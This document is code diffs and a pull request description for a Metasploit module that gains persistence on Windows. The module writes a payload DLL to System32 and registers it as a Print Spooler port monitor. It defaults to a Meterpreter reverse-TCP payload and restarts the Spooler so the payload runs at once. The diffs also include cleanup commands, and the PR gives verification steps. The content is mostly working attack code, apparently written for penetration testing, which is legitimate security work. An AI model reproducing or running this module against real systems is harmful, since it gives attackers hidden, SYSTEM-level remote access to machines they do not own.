+    @clean_up_rc << "rm \"#{payload_path.gsub('\\', '/')}\"\n"
+    if @existing_monitor_key
+      if @original_driver.nil?
+        @clean_up_rc << "reg deleteval -k '#{monitor_reg_key}' -v 'Driver'\n"
+      else
+        @clean_up_rc << "reg setval -k '#{monitor_reg_key}' -v 'Driver' -d '#{@original_driver}' -t REG_SZ\n"
+      end
+    else
+      @clean_up_rc << "reg deletekey -k '#{monitor_reg_key}'\n"
+    end
+  end
+
+  def restart_spooler
+    print_status('Attempting to restart Spooler service for immediate payload trigger...')
+    stop_result = service_stop('Spooler')
+    start_result = service_start('Spooler')
+    if stop_result.zero? && start_result.zero?
+      print_good('Spooler service restarted successfully')
+    else
+      print_warning("Unable to restart Spooler cleanly (stop=#{stop_result}, start=#{start_result}).")
+    end
+  rescue Rex::Post::Meterpreter::RequestError, NoMethodError => e
+    print_warning("Failed to restart Spooler service automatically: #{e.class} #{e}")
+  end
+end

--- a/modules/exploits/windows/persistence/port_monitor.rb
+++ b/modules/exploits/windows/persistence/port_monitor.rb
@@ -31,6 +31,10 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'License' => MSF_LICENSE,
         'Author' => ['Nayera'],
+        'DefaultOptions' => {
+        'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+        'DisablePayloadHandler' => true
+         },
         'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter', 'shell' ],

--- a/modules/exploits/windows/persistence/port_monitor.rb
+++ b/modules/exploits/windows/persistence/port_monitor.rb
@@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Local
         'License' => MSF_LICENSE,
         'Author' => ['Nayera'],
         'DefaultOptions' => {
-        'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
-        'DisablePayloadHandler' => true
-         },
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'DisablePayloadHandler' => true
+        },
         'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter', 'shell' ],
@@ -113,7 +113,6 @@ class MetasploitModule < Msf::Exploit::Local
     if sysinfo['Architecture'] != payload_instance.arch.first
       print_warning("Payload architecture (#{payload_instance.arch.first}) does not match target architecture (#{sysinfo['Architecture']})")
     end
-
 
     print_status("Writing payload DLL to #{payload_path}")
     write_file(payload_path, payload_dll)

--- a/modules/exploits/windows/persistence/port_monitor.rb
+++ b/modules/exploits/windows/persistence/port_monitor.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
       [
         OptString.new('MONITOR_NAME', [false, 'Name of the print monitor registry key to create.', 'Hadess']),
         OptString.new('DLL_NAME', [false, 'DLL filename to write in %WINDIR%\\System32.', 'persist.dll']),
-        OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger monitor loading immediately.', false])
+        OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger monitor loading immediately.', true])
       ]
     )
   end

--- a/modules/exploits/windows/persistence/port_monitor.rb
+++ b/modules/exploits/windows/persistence/port_monitor.rb
@@ -106,7 +106,10 @@ class MetasploitModule < Msf::Exploit::Local
     fail_with(Failure::BadConfig, 'MONITOR_NAME cannot be empty') if datastore['MONITOR_NAME'].strip.empty?
 
     payload_dll = generate_payload_dll(dll_exitprocess: true)
-    fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system") unless sysinfo['Architecture'] == payload_instance.arch.first
+    if sysinfo['Architecture'] != payload_instance.arch.first
+      print_warning("Payload architecture (#{payload_instance.arch.first}) does not match target architecture (#{sysinfo['Architecture']})")
+    end
+
 
     print_status("Writing payload DLL to #{payload_path}")
     write_file(payload_path, payload_dll)


### PR DESCRIPTION
This PR fixes [#20826](https://github.com/rapid7/metasploit-framework/issues/20826) by adding a Windows persistence module that abuses the Print Spooler Port Monitor mechanism to execute a malicious DLL.

The module creates a monitor under `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors` and sets its `Driver` value to a payload DLL placed in `%WINDIR%\System32`.

When the Print Spooler service starts, the DLL is loaded automatically, executing the payload and establishing persistence.


## Verification

- [ ] Start `msfconsole`
- [ ] Get a SYSTEM session
- [ ] `use exploit/windows/persistence/port_monitor`
- [ ] `set SESSION <id>`
- [ ] `check`
- [ ] `run`
**_To verify it worked_** 
- [ ] `sessions -i <id>`
- [ ] `shell`
- [ ] `net stop spooler`
- [ ] `net start spooler`
- [ ] `reg query HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\<monitor_name>`

### A scenario example in the documentation